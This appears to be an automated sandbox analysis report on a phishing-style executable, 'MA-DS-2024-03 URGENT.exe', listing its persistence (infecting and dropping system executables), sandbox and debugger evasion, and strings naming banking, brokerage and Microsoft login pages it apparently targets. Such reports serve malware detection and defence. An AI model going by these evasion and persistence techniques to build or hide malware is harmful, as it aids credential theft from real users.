                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 01698AB5h; ret 0_2_01698B13
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 01698784h; ret 0_2_01698CA1
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 01698DC9h; ret 0_2_01698E1C
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 01698D14h; ret 0_2_01698E2E
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 01698674h; ret 0_2_01698E4D
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 016988A6h; ret 0_2_01698F76
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 0169868Ch; ret 0_2_01698FA4
                Source: MA-DS-2024-03 URGENT.exeStatic PE information: section name: .reloc entropy: 7.938039574595139
                Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.943002587659106

                Persistence and Installation Behavior

                barindex
                Creates files in the system32 config directory
                Source: C:\Windows\System32\AppVClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\8e8aaae4f259d5dc.binJump to behavior
                Drops executable to a common third party application directory
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Infects executable files (exe, dll, sys, html)
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0169CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_0169CBD0
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00485376
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00423187
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeAPI/Special instruction interceptor: Address: B6620C
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1252324848.0000000000AED000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1254664887.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1253646538.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1254591727.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1254875683.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1254769359.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1255155319.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1252476746.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1255061875.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEEXE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0377096E rdtsc 4_2_0377096E
                Source: C:\Windows\SysWOW64\choice.exeWindow / User API: threadDelayed 3321Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exeWindow / User API: threadDelayed 6652Jump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeAPI coverage: 5.0 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\choice.exe TID: 1408Thread sleep count: 3321 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exe TID: 1408Thread sleep time: -6642000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\choice.exe TID: 1408Thread sleep count: 6652 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exe TID: 1408Thread sleep time: -13304000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\choice.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
                Source: G109m407.17.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: G109m407.17.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: G109m407.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: G109m407.17.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: G109m407.17.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: fbLIkXRoMf.exe, 00000012.00000002.2503046270.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
                Source: G109m407.17.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: G109m407.17.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: G109m407.17.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: G109m407.17.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: G109m407.17.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000002.1287315581.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000002.1287315581.0000000000B96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: G109m407.17.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: AppVClient.exe, 0000000B.00000002.1295498591.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000B.00000003.1284482715.000000000057F000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000B.00000003.1285279681.00000000005AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
                Source: G109m407.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: G109m407.17.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: G109m407.17.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: G109m407.17.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: G109m407.17.drBinary or memory string: discord.comVMware20,11696492231f
                Source: choice.exe, 00000011.00000002.2500574105.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2081697532.0000022C2C93C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: G109m407.17.drBinary or memory string: global block list test formVMware20,11696492231
                Source: G109m407.17.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: G109m407.17.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: G109m407.17.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: G109m407.17.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: G109m407.17.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: G109m407.17.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: G109m407.17.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: G109m407.17.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: G109m407.17.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: G109m407.17.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: G109m407.17.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: G109m407.17.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: G109m407.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: G109m407.17.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeAPI call chain: ExitProcess graph end nodegraph_0-108798
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeAPI call chain: ExitProcess graph end nodegraph_0-109141
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0377096E rdtsc 4_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00417D33 LdrLoadDll,4_2_00417D33
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00473F09 BlockInput,0_2_00473F09
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00435A7C
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0056C594 mov eax, dword ptr fs:[00000030h]0_2_0056C594
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00B664D8 mov eax, dword ptr fs:[00000030h]0_2_00B664D8
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00B66478 mov eax, dword ptr fs:[00000030h]0_2_00B66478
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00B64E38 mov eax, dword ptr fs:[00000030h]0_2_00B64E38
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01671130 mov eax, dword ptr fs:[00000030h]0_2_01671130
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_016B3F3D mov eax, dword ptr fs:[00000030h]0_2_016B3F3D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D437C mov eax, dword ptr fs:[00000030h]4_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B035C mov eax, dword ptr fs:[00000030h]4_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B035C mov eax, dword ptr fs:[00000030h]4_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B035C mov eax, dword ptr fs:[00000030h]4_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B035C mov ecx, dword ptr fs:[00000030h]4_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B035C mov eax, dword ptr fs:[00000030h]4_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B035C mov eax, dword ptr fs:[00000030h]4_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FA352 mov eax, dword ptr fs:[00000030h]4_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D8350 mov ecx, dword ptr fs:[00000030h]4_2_037D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B2349 mov eax, dword ptr fs:[00000030h]4_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B2349 mov eax, dword ptr fs:[00000030h]4_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B2349 mov eax, dword ptr fs:[00000030h]4_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B2349 mov eax, dword ptr fs:[00000030h]4_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B2349 mov eax, dword ptr fs:[00000030h]4_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B2349 mov eax, dword ptr fs:[00000030h]4_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B2349 mov eax, dword ptr fs:[00000030h]4_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B2349 mov eax, dword ptr fs:[00000030h]4_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B2349 mov eax, dword ptr fs:[00000030h]4_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B2349 mov eax, dword ptr fs:[00000030h]4_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B2349 mov eax, dword ptr fs:[00000030h]4_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B2349 mov eax, dword ptr fs:[00000030h]4_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B2349 mov eax, dword ptr fs:[00000030h]4_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B2349 mov eax, dword ptr fs:[00000030h]4_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B2349 mov eax, dword ptr fs:[00000030h]4_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372C310 mov ecx, dword ptr fs:[00000030h]4_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03750310 mov ecx, dword ptr fs:[00000030h]4_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A30B mov eax, dword ptr fs:[00000030h]4_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A30B mov eax, dword ptr fs:[00000030h]4_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A30B mov eax, dword ptr fs:[00000030h]4_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374E3F0 mov eax, dword ptr fs:[00000030h]4_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374E3F0 mov eax, dword ptr fs:[00000030h]4_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374E3F0 mov eax, dword ptr fs:[00000030h]4_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037663FF mov eax, dword ptr fs:[00000030h]4_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037403E9 mov eax, dword ptr fs:[00000030h]4_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037403E9 mov eax, dword ptr fs:[00000030h]4_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037403E9 mov eax, dword ptr fs:[00000030h]4_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037403E9 mov eax, dword ptr fs:[00000030h]4_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037403E9 mov eax, dword ptr fs:[00000030h]4_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037403E9 mov eax, dword ptr fs:[00000030h]4_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037403E9 mov eax, dword ptr fs:[00000030h]4_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037403E9 mov eax, dword ptr fs:[00000030h]4_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DE3DB mov eax, dword ptr fs:[00000030h]4_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DE3DB mov eax, dword ptr fs:[00000030h]4_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DE3DB mov ecx, dword ptr fs:[00000030h]4_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DE3DB mov eax, dword ptr fs:[00000030h]4_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D43D4 mov eax, dword ptr fs:[00000030h]4_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D43D4 mov eax, dword ptr fs:[00000030h]4_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037EC3CD mov eax, dword ptr fs:[00000030h]4_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373A3C0 mov eax, dword ptr fs:[00000030h]4_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373A3C0 mov eax, dword ptr fs:[00000030h]4_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373A3C0 mov eax, dword ptr fs:[00000030h]4_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373A3C0 mov eax, dword ptr fs:[00000030h]4_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373A3C0 mov eax, dword ptr fs:[00000030h]4_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373A3C0 mov eax, dword ptr fs:[00000030h]4_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037383C0 mov eax, dword ptr fs:[00000030h]4_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037383C0 mov eax, dword ptr fs:[00000030h]4_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037383C0 mov eax, dword ptr fs:[00000030h]4_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037383C0 mov eax, dword ptr fs:[00000030h]4_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B63C0 mov eax, dword ptr fs:[00000030h]4_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03728397 mov eax, dword ptr fs:[00000030h]4_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03728397 mov eax, dword ptr fs:[00000030h]4_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03728397 mov eax, dword ptr fs:[00000030h]4_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372E388 mov eax, dword ptr fs:[00000030h]4_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372E388 mov eax, dword ptr fs:[00000030h]4_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372E388 mov eax, dword ptr fs:[00000030h]4_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375438F mov eax, dword ptr fs:[00000030h]4_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375438F mov eax, dword ptr fs:[00000030h]4_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E0274 mov eax, dword ptr fs:[00000030h]4_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E0274 mov eax, dword ptr fs:[00000030h]4_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E0274 mov eax, dword ptr fs:[00000030h]4_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E0274 mov eax, dword ptr fs:[00000030h]4_2_037E0274
